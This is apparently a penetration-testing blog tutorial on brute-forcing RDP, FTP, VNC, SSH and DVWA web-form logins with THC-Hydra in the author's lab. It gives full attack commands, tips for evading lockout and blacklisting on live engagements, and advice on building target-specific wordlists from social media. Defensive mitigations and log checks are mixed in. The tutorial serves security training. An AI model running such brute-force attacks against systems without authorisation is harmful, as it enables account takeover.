Brute Forcing Passwords with THC-Hydra

What is THC-Hydra?

Hydra is a very fast online password cracking tool, which can perform rapid dictionary attacks against more than 50 Protocols, including Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases and much more. THC (The Hackers Choice) created Hydra for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

 

Installing THC-Hydra

If you are running Kali Linux you will already have a version of Hydra installed, for all other Debian based Linux operating systems download from the repository by using.

sudo apt-get install hydra

or you can download the latest version from THC’s public GitHub development repository https://github.com/vanhauser-thc/thc-hydra

Start by using git to clone the GitHub repository.

git clone https://github.com/vanhauser-thc/thc-hydra

next change into the thc-hydra directory.

cd thc-hydra

now just type.

./configure

then…

make

and then.

sudo make install

 

Hydra-GTK

Hydra GTK is a GUI front end for hydra, as this is a GUI for hydra you do have to have THC-hydra already installed. I f you are running Kali Linux this will already be pre-installed for everyone else you can install it by typing.

sudo apt-get install hydra-gtk

Once installed you will have a new application called xHydra, open this up and you should see a window that looks like this.

To check out the latest information about Hydra-GTK project over on their GitHub page https://github.com/vanhauser-thc/thc-hydra/tree/master/hydra-gtk

If you already downloaded hydra from THC’s GitHub repository you also download the latest version of Hydra-GTK.

Within the thc-hydra folder, you downloaded from THCs GitHub earlier, you should see a folder called  hydra-gtx

cd hydra-gtk/

Before I could compile the source code I had to have the gtk2.0 dependency installed

sudo apt-get install gtk2.0

Once installed I was able to compile the source code as normal.

./configure
make
sudo make install

THC-Hydra’s Help File

Once you have Hydra installed, you can check out its help file by typing hydra -h .

hydra -h
Hydra v8.6-dev (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-ISOuvVd46] [service://server[:PORT][/OPT]]

Options:
 -R restore a previous aborted/crashed session
 -I ignore an existing restore file (dont wait 10 seconds)
 -S perform an SSL connect
 -s PORT if the service is on a different default port, define it here
 -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
 -p PASS or -P FILE try password PASS, or load several passwords from FILE
 -x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
 -y disable use of symbols in bruteforce, see above
 -e nsr try "n" null password, "s" login as pass and/or "r" reversed login
 -u loop around users, not passwords (effective! implied with -x)
 -C FILE colon separated "login:pass" format, instead of -L/-P options
 -M FILE list of servers to attack, one entry per line, ':' to specify port
 -o FILE write found login/password pairs to FILE instead of stdout
 -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
 -f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
 -t TASKS run TASKS number of connects in parallel per target (default: 16)
 -T TASKS run TASKS connects in parallel overall (for -M, default: 64)
 -w / -W TIME waittime for responses (32) / between connects per thread (0)
 -4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
 -v / -V / -d verbose mode / show login+pass for each attempt / debug mode 
 -O use old SSL v2 and v3
 -q do not print messages about connection errors
 -U service module usage details
 server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
 service the service to crack (see below for supported protocols)
 OPT some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: postgres sapr3 firebird afp ncp ssh sshkey svn oracle mysql5 and regex support.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:[email protected]:9150 (or: socks4:// connect://)
 % export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
 % export HYDRA_PROXY_HTTP=http://login:[email protected]:8080
 % export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)

Examples:
 hydra -l user -P passlist.txt ftp://192.168.0.1
 hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
 hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
 hydra -l admin -p password ftp://[192.168.0.0/24]/
 hydra -L logins.txt -P pws.txt -M targets.txt ssh

 

Brute Force \Dictionary Attack

Hydra can use either a dictionary based attack, where you give Hydra an explicit list of words for it to try or a brute Force attack which will try every single possible combination of letters each one has its benefits and drawbacks.

Dictionary Attack will use a precompiled list of words or word list, this will speed up the cracking process over brute force because the program will only run through each word in the wordlist but if the word is not in said word list your attack will fail.

If you are running Kali you will already have a whole bunch of word lists for you to use, just type locate wordlist in a terminal to find their location.

For everyone else not running Kali, you can download some good word lists from SkullSecurity.org password wiki, look for the rockyou.txt as this is what I will be using in my examples below.

If this was a targeted attack against someone you could use something like CUPP (Common User Passwords Profiler) to create a wordlist more specific to the target. It takes birthday, nickname, address, a name of pet, etc. Enter the details you know or what you can find out via social media and it will create a wordlist based on your inputs.

Brute Force will crack a password by trying every possible combination of the password so, for example, it will try aaaa then aaab, aaac, aaae . This quite considerably increases the time the attack takes but reduces the likeliness of the attack to fail.

In hydra, you can use the -x to enable the brute force options. Brute force options have its own help file which you can get to by typing hydra -x -h.

hydra -x -h
Hydra v8.6-dev (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra bruteforce password generation option usage:

  -x MIN:MAX:CHARSET

     MIN     is the minimum number of characters in the password
     MAX     is the maximum number of characters in the password
     CHARSET is a specification of the characters to use in the generation
             valid CHARSET values are: 'a' for lowercase letters,
             'A' for uppercase letters, '1' for numbers, and for all others,
             just add their real representation.
  -y         disable the use if the above letters as placeholders

Examples:
   -x 3:5:a  generate passwords from length 3 to 5 with all lowercase letters
   -x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbers
   -x 1:3:/  generate passwords from length 1 to 3 containing only slashes
   -x 5:5:/%,.-  generate passwords with length 5 which consists only of /%,.-
   -x 3:5:aA1 -y generate passwords from length 3 to 5 with a, A and 1 only

The bruteforce mode was made by Jan Dlabal, http://houbysoft.com/bfg/

RDP

To set the scene I have a Windows 2012 server with Remote Desktop setup, running in my virtual lab. The virtual machine has an IP of 192.168.34.16 and one user called administrator.

So lets fire up hydra with our rockyou word list and run this command

hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://192.168.34.16

-t 4 This sets the number of tasks that can run parallel together in this example I have used 4 which will send 4 logins at a time. RDP does not like too many connections at the same time so try and keep it at a maximum of 4. It is sometimes worth adding a -w to your command to add a wait between attempts.
-V – Verbose this shows you which usernames and passwords on screen as it’s working.
-f  Quits once you have found a positive Username and Password match.
-l administrator – Use the username administrator to attempt to login.
-P rockyou.txt– This is the word list that we will be pulling passwords from.
rdp://192.168.34.16 – This is the service we want to attack and the IP address.

You should see each attempt as it tries to connect to RDP like pictured below, as we have used the -f command hydra will stop once it has found a positive match.

In Event Viewer on the Windows 2012 server with RDP enabled you will see lots of Event ID 4625 in the security logs. As you can see below this gives away a lot of information to the system admin where the brute force has come from.

 

If you are the admin of the server who’s RDP is getting brute forced, you can mitigate this by changing the default port RDP listens on or if you have a router that allows you to transpose ports this is probably the better option.

If you’re interested in changing the port RDP listens on in a Windows PC start by opening the registry editor (Regedit).

Then locate the following registry sub key:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TCP\PortNumber

On the Edit menu, click Modify, and then click Decimal

Type the new port number, and then click OK

Quit the Registry Editor.

Then Restart the Computer.

Once the computer restarts you will be able to connect to it using Remote Desktop Connection as normal but you now need to add a colon (:) then the new port at the end of the address like pictured below.

 

Another option is to restrict RDP access by telling the windows firewall which IP’s are allowed to connect to the RDP port and which are not. I have already done a tutorial on this check that out here

 

FTP

Using the same Windows 2012 server I used for the RDP brute force above I installed the latest version of FileZilla Server, which can be downloaded from their website https://filezilla-project.org/

I’m not going to go into the ins and outs of setting up FileZilla server there are plenty of guides for that just google it, just know that I setup this FTP server for one user called admin with a password of [email protected]

Then I run this hydra command in the terminal, notice I have used a capital -L in this command. This specifies a word list which contains a list of usernames. use a lowercase l if you want to specify a single username.

hydra -t 5 -V -f -L userlist -P passwordlist ftp://192.168.34.16

-t 5 this sets the number of tasks or logins it will try simultaneously. I have gone for 5 here but just remember don’t go too high as it may give you false results.
-V Verbose this will display the login and password it tries in the terminal for each attempt/
-f Quits once hydra has found a positive Username and Password match.
-L userlist The capital -L  here means I’m using a wordlist of usernames called userlist if a -l was used this specifies a single username to try.
-P passwordlist The capital -P here means I’m using a word list called passwordlist if a -p was used this specifies a single password to try.
ftp://192.168.34.16 This is the service we want to attack and the IP address of the FTP server

You will see each attempt as it try’s all the specified username and password combinations until it either finds a match or it or runs out of combinations.

 

As you can see below every attempt is logged in the FileZilla console you can also see all 5 login tasks running at the bottom simultaneously.

 

.

 

Within FileZilla, you can enable auto ban to stop a hacker brute forcing the username and password of the FTP. When enabled this blocks the IP address which the hacker is using to login from after a specified amount of failed logins, the default is 10.

 

Interestingly hydra just continued to try passwords even though my IP was banned it went through the whole username and password list and said nothing in the list matched even though I know the username and password were on that list.

 

VNC

I have installed VNC server on the Linux mint box on 192.168.100.155 running in my virtual lab then added a password of [email protected] to the VNC server, I have a quick run down on how to set this up in Mint below.

apt-get install vnc4server
vncpasswd
Password:[email protected]
Verify:[email protected]
vncserver

In the past, VNC has been a very insecure program due to having no login name and any password could be set and it does not have to meet any complexity requirements that being said in the newer versions they have added a blacklist feature that will block you after 5 failed login attempts.

So for our brute force to work, I have had to switch off the blacklisting feature by running this command on the Linux Mint box.

vncconfig -display :1 -set BlacklistTimeout=0 -set BlacklistThreshold=1000000

This will stop me from blacklisting myself in my test lab, on a live engagement I would suggest increasing the wait time per try in hydra (-W ) to anything over 60 and if you are attacking an older version of VNC this blacklisting feature is not enabled by default.

Also as a little side note don’t use more than 4 tasks (-t 4) in your command as you may find it gives you some false negatives and remember there is no username on VNC connections so we won’t need the -l in our command.

After you have turned off the blacklisting feature run this command in hydra.

hydra -P passwordlist -t 1 -w 5 -f -s 5901 192.168.100.155 vnc -v

-P passwordlist The capital -P here means I’m using a word list called passwordlist if a -p was used this specifies a single password to try.
-t 1 This sets the number of tasks or logins it will try simultaneously. I have gone for 1 here but just remember don’t go higher than 4 for brute forcing VNC.
-w 5 This sets the wait time between tries I have gone for 5 here but remember to go a lot higher if the blacklisting feature is still enabled
-f Quits once hydra has found a positive Password match.
-s 5901 This changes the default port for hydra to connect to the VNC server from 5900 to 5901 which was what my VNC server defaulted to.
192.168.100.155 vnc This specifies the IP address of the VNC server and the service we want to attack.
-v Verbose this will display the password it tries in the terminal for each attempt.

Once the command is run you should see an output like this.

As I said above VNC passwords are notably weak. you should never run a VNC server directly over the internet The blacklist time-out feature prevents some brute forcing of the passwords but if you hit the server slow enough not to get blacklisted it can still be brute-forced.

Instead, you should run VNC server on 127.0.0.1 by adding -localhost to the command line:

vncserver -localhost

then use SSH tunnelling to link a port on your machine to the port on the server.

ssh -L 5901:localhost:5901 [email protected]<ServerIP>

Then while that SSH connection is alive, you can connect your VNC client to the port 5901 on your machine.

If you want more information about SSH tunnelling check out my tutorial all about SSH here

Just before I finish up with brute forcing VNC you can find the VNC logs in a hidden folder called .vnc in your home folder. The contents of this log will look something like the text below points 1: and 2: you can see hydra trying the wrong password and point 3: is where the password was correct, interestingly it does not seem to give the IP address of the pc I am using to brute force it.

1:SConnection: Client needs protocol version 3.7
 SConnection: Client requests security type VncAuth(2)
 SConnection: AuthFailureException: Authentication failure
 Connections: closed: 0.0.0.0::40744 (Authentication failure)
 2: Connections: accepted: 0.0.0.0::40746
 SConnection: Client needs protocol version 3.7
 SConnection: Client requests security type VncAuth(2)
 SConnection: AuthFailureException: Authentication failure
 Connections: closed: 0.0.0.0::40746 (Authentication failure)
 3: Connections: accepted: 0.0.0.0::40748
 SConnection: Client needs protocol version 3.7
 SConnection: Client requests security type VncAuth(2)
 VNCSConnST: Server default pixel format depth 16 (16bpp) little-endian rgb565
 Connections: closed: 0.0.0.0::40748 (Clean disconnection)
 SMsgWriter: framebuffer updates 0
 SMsgWriter: raw bytes equivalent 0, compression ratio -nan

 

SSH

To set the scene here I have got Linux Mint running in my virtual lab on 192,168.100.155 with SSH installed, On the Linux Mint box, I created a user called admin with a password of [email protected]

I have already done a tutorial on setting up Linux Mint in Virtual Box here

also I have a guide on installing SSH in Linux check out this tutorial here

Ok, so now we have our virtual machine with SSH running on it. we can use this command in Hydra to start brute forcing the SSH login.

hydra -l admin -P passwordlist ssh://192.168.100.155 -V

-l admin The small l here states that I am going to specify a username use a capital L if you are going to specify a user list.
-P passwordlist The capital P here says I’m going to be specifying a list of passwords in a file called passwordlist.
ssh://192.168.100.155 This is the service we want to attack and the IP address of the SSH server.
-V Verbose this will display the login and password it tries in the terminal for each attempt.

Once you run this command you should see all the attempts in the terminal like pictured below, notice where I have not added -t in the command the number of simultaneous logins will be 16 which is the default.

If you are interested, SSH logs access attempts in the /var/log/auth.log

To make this log a bit easier on the eyes you can use the Linux tail command to display the last x number of lines of your auth.log.

Use the following command to view 100 last lines of your SSH log.

tail -100 /var/log/auth.log | grep 'sshd'

To stop someone from brute forcing your SSH password you can turn off Password authentication altogether and enable SSH key authentication. If you are interested in setting up SSH key authentication check out my tutorial on SSH.

 

Webpage Login

Now, this is where things start to get fun, you can use hydra to brute force webpage logins. To get this to work you need to get some information about the login page like if its a post or a get request before you can construct your command in hydra.

The website login I am going to brute force is the DVWA (Damn Vulnerable Web App) which if you have already taken a look at my tutorial on Setting up a Vulnerable LAMP Server will already have setup and will be ready to go.

Also, you are going to need to have installed some sort of proxy to capture and identify the key parameters of the web login page so we can create our command in hydra. I will be using the Firefox plugin called Tamper Data but you can just as easily use Burp Suite.

The Tamper Data Firefox plugin can be downloaded from https://addons.mozilla.org/en-GB/firefox/addon/tamper-data/

So to start, open up DVWA website in your browser “in my lab I go to http://192.168.100.155/dvwa” and login to the DVWA site with the default credentials of admin /password

You can brute force this main login page but it’s a little bit more advanced than what I want to get into here.

Once logged in, go down to DVWA Security button on the left-hand side of the page and make sure the security Level is set to low.

Once the security is set to low click the Brute Force button on the menu on the left-hand side.

This is the login page we are going to brute force.

Start by firing up Tamper Data, I normally do this in Firefox by hitting the alt key on the keyboard and selecting it from the Tools menu.

 

Now Tamper Data is open click Start Tamper and it will proxy all your Firefox traffic through Tamper Data allowing us to capture the login request.

 

Now go back to DVWA and enter any old username and password and click Login. Tamper Data will capture the login request and ask you if you want to tamper with it, just click submit.

Go back to Tamper Data and right click the first GET request captured and click copy.

Next, Open up any text editor and paste every thing that we copied from Tamper Data this should look something like this

We have now just got to take note of the message that the DVWA website spits back at us to tell us we have entered a wrong username and password.

 

We now have everything to construct our hydra command against this login page.

The command should look something like this below notice that all this information was gathered from Tamper Data and the only part that will be different on yours is the part after PHPSESSID=.

hydra 192.168.100.155 -V -l admin -P passwordlist http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username and/or password incorrect.:H=Cookie: PHPSESSID=rjevaetqb3dqbj1ph3nmjchel2; security=low"

192.168.100.155 The target IP address of the server hosting the webpage
-V Verbose this will display the login and password it tries in the terminal for each attempt.
-l admin The small l here states that I am going to specify a username use a capital L if you are going to specify a user list.
-P passwordlist The capital P here says I’m going to be specifying a list of passwords in a file called passwordlist.
http-get-form Tells hydra that you are going to be using the http-get-form module.
/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login All these details were found in our tamper data request that we copied to our text editor.
F=Username and/or password incorrect. This is the failed login message we received from the DVWA login page, this tells hydra when it’s not received we have a valid login.
H=Cookie: PHPSESSID=rjevaetqb3dqbj1ph3nmjchel2; security=low This is the Cookie we were issued when we logged into the DVWA site at the start also found in the Tamper Data.

If you get an error like pictured below, where it gives you more than one valid password. It means that you have not constructed the command right and probably just need to check that the syntax is correct.

Normally it’s either the PHPSESSID is wrong or the failed logon message is not formatted correctly.

 

If you want more information on the hydra’s http-get-form command, take a look at Hydra’s http-get-form help page by typing hydra http-get-form -U in your terminal.

Help for module http-get-form:
============================================================================
Module http-get-form requires the page and the parameters for the web form.

By default this module is configured to follow a maximum of 5 redirections in
a row. It always gathers a new cookie from the same URL without variables
The parameters take three ":" separated values, plus optional values.
(Note: if you need a colon in the option string as value, escape it with "\:", but do not escape a "\" with "\\".)

Syntax: <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables (taken from either the browser, proxy, etc.
with usernames and passwords being replaced in the "^USER^" and "^PASS^"
placeholders (FORM PARAMETERS)
Third is the string that it checks for an *invalid* login (by default)
Invalid condition login check can be preceded by "F=", successful condition
login check must be preceded by "S=".
This is where most people get it wrong. You have to check the webapp what a
failed string looks like and put it in this parameter!
The following parameters are optional:
C=/page/uri to define a different page to gather initial cookies from
(h|H)=My-Hdr\: foo to send a user defined HTTP header with each request
^USER^ and ^PASS^ can also be put into these headers!
Note: 'h' will add the user-defined header at the end
regardless it's already being sent by Hydra or not.
'H' will replace the value of that header if it exists, by the
one supplied by the user, or add the header at the end
Note that if you are going to put colons (:) in your headers you should escape them with a backslash (\).
All colons that are not option separators should be escaped (see the examples above and below).
You can specify a header without escaping the colons, but that way you will not be able to put colons
in the header value itself, as they will be interpreted by hydra as option separators.

Examples:
"/login.php:user=^USER^&pass=^PASS^:incorrect"
"/login.php:user=^USER^&pass=^PASS^&colon=colon\:escape:S=authlog=.*success"
"/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"
"/:user=^USER&pass=^PASS^:failed:H=Authorization\: Basic dT1w:H=Cookie\: sessid=aaaa:h=X-User\: ^USER^"
"/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"

 

That’s all I’m going to do for now on brute forcing Passwords with THC-Hydra. If there are any more you would like me to show you or you have some feed back for me please leave a comment below.

2 thoughts on “Brute Forcing Passwords with THC-Hydra

    1. Hi Marko Thanks for the comment.

      Get and POST requests are quite similar and if you know how it works with GET you should not have a problem changing the command to http-post-form.

      If you need more information check out Hydra’s help module for http-post-form by typing hydra http-post-form -U into your terminal.

Leave a Reply

Your email address will not be published. Required fields are marked *